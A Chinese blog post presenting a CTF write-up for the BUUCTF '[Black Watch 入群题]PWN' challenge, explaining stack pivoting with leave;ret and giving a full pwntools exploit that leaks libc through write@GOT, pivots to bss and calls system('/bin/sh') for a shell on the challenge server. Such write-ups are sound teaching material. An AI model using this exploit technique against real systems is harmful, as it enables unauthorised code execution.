【BUUCTF】[Black Watch 入群题]PWN

最新推荐文章于 2023-08-01 20:38:25 发布
最新推荐文章于 2023-08-01 20:38:25 发布
阅读量385 收藏
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/111779932
版权

【BUUCTF】[Black Watch 入群题]PWN

记录下刷题,方便自己以后回顾,写的很烂,还请见谅
本题要用栈迁移

先checksec,file和nc看下程序
32位,动态链接,无canary和pie
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写入rop链,ret2libc后就能拿到shell了
主要是如何栈迁移:
leave ret相当于:
leave => mov esp, ebp; pop ebp;
ret => pop eip
pop eip相当于将栈顶数据给eip,栈顶就是rsp决定的,而leave时esp的值由rbp决定,两次leave ret即可控制esp为我们想要的地址。

引用下

程序运行(32位,64位同理):
1、当函数正常返回时,执行leave;ret指令(此处非执行我们覆盖的ret指令)
2、mov esp,ebp;将ebp的值赋给esp,此时esp和ebp同时指向ebp基址处,也就是我们设置的可控制的fake ebp值处。
3、pop ebp,弹出栈顶,也就是ebp的基址,这时会将我们设置的虚假的ebp值赋给ebp寄存器,同时esp+4上行
4、执行ret指令,ret指令相当于pop eip;此时栈顶为我们使用ROPgadget查找的leave;ret指令的地址。将这个地址弹出,赋给eip寄存器。esp+4上行
5、执行eip寄存器中的指令,leave指令;
6、mov esp,ebp;将ebp的值赋给esp,此时ebp寄存器中保存的值为我们设置的虚假的可控的地址,于是esp指向来了该可控地址
7、pop ebp;栈顶弹出赋给ebp,相当于该可控地址的第一个4位地址内容弹出,赋给ebp,可以设置4个a来padding,esp+4上行
8、执行ret,我们一般将此时esp指向的地址设为目标函数地址,就可执行目标函数了。
————————————————
版权声明:本文为CSDN博主「西杭」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/AcSuccess/article/details/104580019

exp:

from pwn import*
r=remote('node3.buuoj.cn',26380)
libc=ELF('./libc-2.23.so')
elf=ELF('./spwn')
context.log_level = 'debug'
context.arch = elf.arch
pd1='aaaa'+p32(elf.sym['write'])+p32(elf.sym['main'])
pd1+=p32(1)+p32(elf.got['write'])+p32(4)
r.send(pd1)
r.send('a'*0x18+p32(0x0804A300)+p32(0x08048408))
r.recvuntil('say?')
true=int(u32(r.recv(4)))
base=true-0xd43c0
print hex(true)
print hex(base)
binsh=0x15902b
system=0x0003a940
pd2='aaaa'+p32(base+system)+p32(0)+p32(binsh+base)
r.recvuntil('name?')
r.send(pd2)
r.recvuntil('say?')
r.send('a'*0x18+p32(0x0804A300)+p32(0x08048408))
r.interactive()
Nq0inaen
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道pwn门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
[Black Watch 群题]PWN-栈迁移
个人笔记
04-20 347
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
PWN · 栈迁移】[BUUCTF][Black Watch 群题]PWN
Mr_Fmnwon的博客
08-01 357
进能够覆盖ebp和ret,很难不往栈迁移上想。 修改ebp和ret后我们可以将栈指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发栈迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
ciscn_2019_es_2的wp
wuyvle的博客
02-16 2059
32位,看看函数主体 read函数0x30只能刚好覆盖ebp和ret。所以我们要用到栈迁移 栈迁移核心思想就是利用leave和ret转移ebp和esp。leave和ret常用于复原栈 leave=mov esp,ebp pop ebp ret=pop eip 首先我们泄露ebp的地址 查看栈区 偏移地址 0x118-0xe=0x38 esp指向了我们写的system,接下来的ret就会使eip指向system函数。 ebp-0x38指向aaaa的地址。aaaa实际就是leave_ret后的ebp指向
buuctf部分题目wp
zhhhb1005的博客
06-19 1057
主要是记录平时做题遇见的没见过的题目
WEB-buuctf-black list
weixin_52804141的博客
01-01 131
buuctf black list
warmup pwn门题
02-11
pwn门题
welpwn pwn 门题
02-11
pwn 门题
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
[Black Watch 群题]PWN(栈迁移)
qq_39869547的博客
02-06 947
栈迁移主要解决溢出空间不足的问题, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
[Black Watch 群题]PWN
m0sway的博客
11-24 1345
[Black Watch 群题]PWN 使用checksec查看: 只开启了栈不可执行,拉进IDA中查看: 直接给了漏洞函数,跟进看: 变量s里面可写0x200个字符,放在bss段中。变量buf里面可写0x20个字符,但是并不能溢出。 可以联想到栈迁移的方法,将栈迁移到变量s所在的bss段中,s里面放上payload 这题没有system和/bin/sh,需要先进行libc泄露再getshell exp: from pwn import * #start r = remote("node4.b
群题
doudoudedi
01-29 725
不好讲就是群题 exp: #! /usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('../binary/spwn') elf=ELF('../binary/spwn') libc=elf.libc else: p=remote('node3.buuoj....
BUU PWN (二)
playmaker的博客
02-07 818
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
[Black Watch 群题]PWN之栈迁移
wuyvle的博客
02-22 197
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后栈迁移到该地址执行,后面就是常规的泄露libc来getshell 栈迁移 首先来介绍一下栈迁移是什么? 以32位程序举例,在使用call这个命令,进一个函数的时候,程序会进行一系列栈操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆栈不平衡以及找不到之前的口地址。 执行完函数后.
[Black Watch 群题]PWN 栈劫持的利用
半岛铁盒的博客
08-17 322
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
栈迁移学习(buuctf [Black Watch 群题])
像初雪一样自由洒落
03-14 973
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
[BUUCTF-pwn]——[Black Watch 群题]PWN
Y_peak的博客
02-21 226
[BUUCTF-pwn]——[Black Watch 群题]PWN 题目地址: https://buuoj.cn/challenges#[Black Watch 群题]PWN 思路 由于可以利用的溢出空间不够, 利用给定的bss段, 利用栈劫持到bss段。进行操作。 下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4 exploit from pwn import * from LibcSearcher import * elf = ELF("./spwn") p =
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值